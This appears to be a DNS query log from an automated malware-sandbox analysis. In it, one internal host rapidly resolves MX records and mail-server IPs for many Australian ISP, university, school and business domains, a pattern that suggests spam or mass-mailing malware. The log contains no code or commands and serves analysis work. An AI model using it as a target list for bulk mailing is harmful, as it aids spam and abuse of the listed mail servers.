                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.389364958 CET8.8.8.8192.168.2.30x19abNo error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.389364958 CET8.8.8.8192.168.2.30x19abNo error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.389364958 CET8.8.8.8192.168.2.30x19abNo error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.389364958 CET8.8.8.8192.168.2.30x19abNo error (0)mta6.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.389364958 CET8.8.8.8192.168.2.30x19abNo error (0)mta6.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.389364958 CET8.8.8.8192.168.2.30x19abNo error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.389364958 CET8.8.8.8192.168.2.30x19abNo error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.389364958 CET8.8.8.8192.168.2.30x19abNo error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.659699917 CET8.8.8.8192.168.2.30xde4dNo error (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.679476976 CET8.8.8.8192.168.2.30x6fecNo error (0)extmail.bpbb.bigpond.com203.36.172.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.679476976 CET8.8.8.8192.168.2.30x6fecNo error (0)extmail.bpbb.bigpond.com203.36.137.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.852142096 CET8.8.8.8192.168.2.30x32bbNo error (0)complete-personnel.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.855609894 CET8.8.8.8192.168.2.30xee4No error (0)bitemark.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.855609894 CET8.8.8.8192.168.2.30xee4No error (0)bitemark.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.855609894 CET8.8.8.8192.168.2.30xee4No error (0)bitemark.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.855609894 CET8.8.8.8192.168.2.30xee4No error (0)bitemark.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.855609894 CET8.8.8.8192.168.2.30xee4No error (0)bitemark.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.855609894 CET8.8.8.8192.168.2.30xee4No error (0)bitemark.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.855609894 CET8.8.8.8192.168.2.30xee4No error (0)bitemark.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.883285046 CET8.8.8.8192.168.2.30x5aa3No error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.883285046 CET8.8.8.8192.168.2.30x5aa3No error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.887311935 CET8.8.8.8192.168.2.30x5385No error (0)completepersonnel-com-au02b.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.887311935 CET8.8.8.8192.168.2.30x5385No error (0)completepersonnel-com-au02b.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.887343884 CET8.8.8.8192.168.2.30x88f5No error (0)ALT1.ASPMX.L.GOOGLE.COM142.250.150.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.903561115 CET8.8.8.8192.168.2.30xfa3aNo error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.020293951 CET8.8.8.8192.168.2.30x6decNo error (0)qimr.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.020293951 CET8.8.8.8192.168.2.30x6decNo error (0)qimr.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.020293951 CET8.8.8.8192.168.2.30x6decNo error (0)qimr.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.042222023 CET8.8.8.8192.168.2.30x99dfNo error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.062021017 CET8.8.8.8192.168.2.30xb9No error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.100246906 CET8.8.8.8192.168.2.30xeefbNo error (0)student.ecu.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.100246906 CET8.8.8.8192.168.2.30xeefbNo error (0)student.ecu.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.129183054 CET8.8.8.8192.168.2.30x2f4eNo error (0)student-ecu-edu-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.129183054 CET8.8.8.8192.168.2.30x2f4eNo error (0)student-ecu-edu-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.227519035 CET8.8.8.8192.168.2.30x82e0No error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.247832060 CET8.8.8.8192.168.2.30xbc77No error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.376024008 CET8.8.8.8192.168.2.30xd1d0No error (0)calmon.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.423403025 CET8.8.8.8192.168.2.30x134aNo error (0)shoal.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.430823088 CET8.8.8.8192.168.2.30x98aaNo error (0)yahoo.co.uk.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.475050926 CET8.8.8.8192.168.2.30x89ecNo error (0)icqa.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.475050926 CET8.8.8.8192.168.2.30x89ecNo error (0)icqa.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.475498915 CET8.8.8.8192.168.2.30xa469No error (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.475498915 CET8.8.8.8192.168.2.30xa469No error (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.496340990 CET8.8.8.8192.168.2.30x199fNo error (0)ocean.mxroute.com144.76.72.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.498153925 CET8.8.8.8192.168.2.30x4283No error (0)asav2.iinet.net.au27.32.32.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.538743973 CET8.8.8.8192.168.2.30x3b16No error (0)mx3.qimr.edu.au203.174.129.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.551755905 CET8.8.8.8192.168.2.30xe908No error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.570305109 CET8.8.8.8192.168.2.30xf229No error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.704467058 CET8.8.8.8192.168.2.30x751dNo error (0)mail.calmon.com.au117.120.13.136A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.826988935 CET8.8.8.8192.168.2.30x55bfNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.826988935 CET8.8.8.8192.168.2.30x55bfNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.826988935 CET8.8.8.8192.168.2.30x55bfNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.847232103 CET8.8.8.8192.168.2.30x5fa8No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.847232103 CET8.8.8.8192.168.2.30x5fa8No error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.847232103 CET8.8.8.8192.168.2.30x5fa8No error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.847232103 CET8.8.8.8192.168.2.30x5fa8No error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.847232103 CET8.8.8.8192.168.2.30x5fa8No error (0)mta6.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.847232103 CET8.8.8.8192.168.2.30x5fa8No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.847232103 CET8.8.8.8192.168.2.30x5fa8No error (0)mta6.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.847232103 CET8.8.8.8192.168.2.30x5fa8No error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.863567114 CET8.8.8.8192.168.2.30xf5ffNo error (0)henry.datawave.net.au43.255.139.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.916554928 CET8.8.8.8192.168.2.30xc1adNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.916554928 CET8.8.8.8192.168.2.30xc1adNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.916554928 CET8.8.8.8192.168.2.30xc1adNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.934592009 CET8.8.8.8192.168.2.30x86a5No error (0)mta7.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.934592009 CET8.8.8.8192.168.2.30x86a5No error (0)mta7.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.934592009 CET8.8.8.8192.168.2.30x86a5No error (0)mta7.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.934592009 CET8.8.8.8192.168.2.30x86a5No error (0)mta7.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.934592009 CET8.8.8.8192.168.2.30x86a5No error (0)mta7.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.934592009 CET8.8.8.8192.168.2.30x86a5No error (0)mta7.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.934592009 CET8.8.8.8192.168.2.30x86a5No error (0)mta7.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.934592009 CET8.8.8.8192.168.2.30x86a5No error (0)mta7.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.975198984 CET8.8.8.8192.168.2.30x10faNo error (0)nazareth.vic.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.975198984 CET8.8.8.8192.168.2.30x10faNo error (0)nazareth.vic.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.994117975 CET8.8.8.8192.168.2.30xe0eeNo error (0)au-smtp-inbound-2.mimecast.com124.47.150.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.994117975 CET8.8.8.8192.168.2.30xe0eeNo error (0)au-smtp-inbound-2.mimecast.com124.47.150.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.994117975 CET8.8.8.8192.168.2.30xe0eeNo error (0)au-smtp-inbound-2.mimecast.com103.13.69.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.994117975 CET8.8.8.8192.168.2.30xe0eeNo error (0)au-smtp-inbound-2.mimecast.com103.13.69.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.060570002 CET8.8.8.8192.168.2.30x615cNo error (0)tio.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.060570002 CET8.8.8.8192.168.2.30x615cNo error (0)tio.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.072747946 CET8.8.8.8192.168.2.30xa839No error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.072747946 CET8.8.8.8192.168.2.30xa839No error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.084997892 CET8.8.8.8192.168.2.30xd3ffNo error (0)cluster5.us.messagelabs.com67.219.250.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.084997892 CET8.8.8.8192.168.2.30xd3ffNo error (0)cluster5.us.messagelabs.com67.219.250.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.084997892 CET8.8.8.8192.168.2.30xd3ffNo error (0)cluster5.us.messagelabs.com67.219.246.211A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.084997892 CET8.8.8.8192.168.2.30xd3ffNo error (0)cluster5.us.messagelabs.com67.219.247.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.084997892 CET8.8.8.8192.168.2.30xd3ffNo error (0)cluster5.us.messagelabs.com67.219.247.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.084997892 CET8.8.8.8192.168.2.30xd3ffNo error (0)cluster5.us.messagelabs.com67.219.246.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.100577116 CET8.8.8.8192.168.2.30x7507No error (0)asav2.iinet.net.au27.32.32.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.172243118 CET8.8.8.8192.168.2.30xc2b8No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.172243118 CET8.8.8.8192.168.2.30xc2b8No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.172243118 CET8.8.8.8192.168.2.30xc2b8No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.195369959 CET8.8.8.8192.168.2.30x857No error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.195369959 CET8.8.8.8192.168.2.30x857No error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.195369959 CET8.8.8.8192.168.2.30x857No error (0)mta6.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.195369959 CET8.8.8.8192.168.2.30x857No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.195369959 CET8.8.8.8192.168.2.30x857No error (0)mta6.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.195369959 CET8.8.8.8192.168.2.30x857No error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.195369959 CET8.8.8.8192.168.2.30x857No error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.195369959 CET8.8.8.8192.168.2.30x857No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.251838923 CET8.8.8.8192.168.2.30x59No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.251838923 CET8.8.8.8192.168.2.30x59No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.251838923 CET8.8.8.8192.168.2.30x59No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.275914907 CET8.8.8.8192.168.2.30x1445No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.275914907 CET8.8.8.8192.168.2.30x1445No error (0)mta6.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.275914907 CET8.8.8.8192.168.2.30x1445No error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.275914907 CET8.8.8.8192.168.2.30x1445No error (0)mta6.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.275914907 CET8.8.8.8192.168.2.30x1445No error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.275914907 CET8.8.8.8192.168.2.30x1445No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.275914907 CET8.8.8.8192.168.2.30x1445No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.275914907 CET8.8.8.8192.168.2.30x1445No error (0)mta6.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.281186104 CET8.8.8.8192.168.2.30x2b77Name error (3)bruhn.id.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.332180977 CET8.8.8.8192.168.2.30x12fdNo error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.355963945 CET8.8.8.8192.168.2.30x72b7No error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.437505007 CET8.8.8.8192.168.2.30x93e9No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.437505007 CET8.8.8.8192.168.2.30x93e9No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.437505007 CET8.8.8.8192.168.2.30x93e9No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.462132931 CET8.8.8.8192.168.2.30xea9cNo error (0)mta7.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.462132931 CET8.8.8.8192.168.2.30xea9cNo error (0)mta7.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.462132931 CET8.8.8.8192.168.2.30xea9cNo error (0)mta7.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.462132931 CET8.8.8.8192.168.2.30xea9cNo error (0)mta7.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.462132931 CET8.8.8.8192.168.2.30xea9cNo error (0)mta7.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.462132931 CET8.8.8.8192.168.2.30xea9cNo error (0)mta7.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.462132931 CET8.8.8.8192.168.2.30xea9cNo error (0)mta7.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.462132931 CET8.8.8.8192.168.2.30xea9cNo error (0)mta7.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.535435915 CET8.8.8.8192.168.2.30xdc59No error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.556534052 CET8.8.8.8192.168.2.30xcce1No error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.639273882 CET8.8.8.8192.168.2.30x8f58No error (0)qnp.newsltd.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.639273882 CET8.8.8.8192.168.2.30x8f58No error (0)qnp.newsltd.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.661243916 CET8.8.8.8192.168.2.30x22b0No error (0)au-smtp-inbound-1.mimecast.com103.13.69.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.661243916 CET8.8.8.8192.168.2.30x22b0No error (0)au-smtp-inbound-1.mimecast.com103.13.69.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.661243916 CET8.8.8.8192.168.2.30x22b0No error (0)au-smtp-inbound-1.mimecast.com124.47.150.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.661243916 CET8.8.8.8192.168.2.30x22b0No error (0)au-smtp-inbound-1.mimecast.com124.47.150.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.711499929 CET8.8.8.8192.168.2.30xa974No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.711499929 CET8.8.8.8192.168.2.30xa974No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.711499929 CET8.8.8.8192.168.2.30xa974No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.742023945 CET8.8.8.8192.168.2.30x68e5No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.742023945 CET8.8.8.8192.168.2.30x68e5No error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.742023945 CET8.8.8.8192.168.2.30x68e5No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.742023945 CET8.8.8.8192.168.2.30x68e5No error (0)mta6.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.742023945 CET8.8.8.8192.168.2.30x68e5No error (0)mta6.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.742023945 CET8.8.8.8192.168.2.30x68e5No error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.742023945 CET8.8.8.8192.168.2.30x68e5No error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.742023945 CET8.8.8.8192.168.2.30x68e5No error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.775099993 CET8.8.8.8192.168.2.30xf1faNo error (0)tpg.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.799895048 CET8.8.8.8192.168.2.30x819No error (0)asav.tpg.com.au27.32.32.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.874720097 CET8.8.8.8192.168.2.30x21c8No error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.894303083 CET8.8.8.8192.168.2.30x4062No error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.968602896 CET8.8.8.8192.168.2.30x6f83No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.968602896 CET8.8.8.8192.168.2.30x6f83No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.968602896 CET8.8.8.8192.168.2.30x6f83No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.987422943 CET8.8.8.8192.168.2.30x2843No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.987422943 CET8.8.8.8192.168.2.30x2843No error (0)mta6.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.987422943 CET8.8.8.8192.168.2.30x2843No error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.987422943 CET8.8.8.8192.168.2.30x2843No error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.987422943 CET8.8.8.8192.168.2.30x2843No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.987422943 CET8.8.8.8192.168.2.30x2843No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
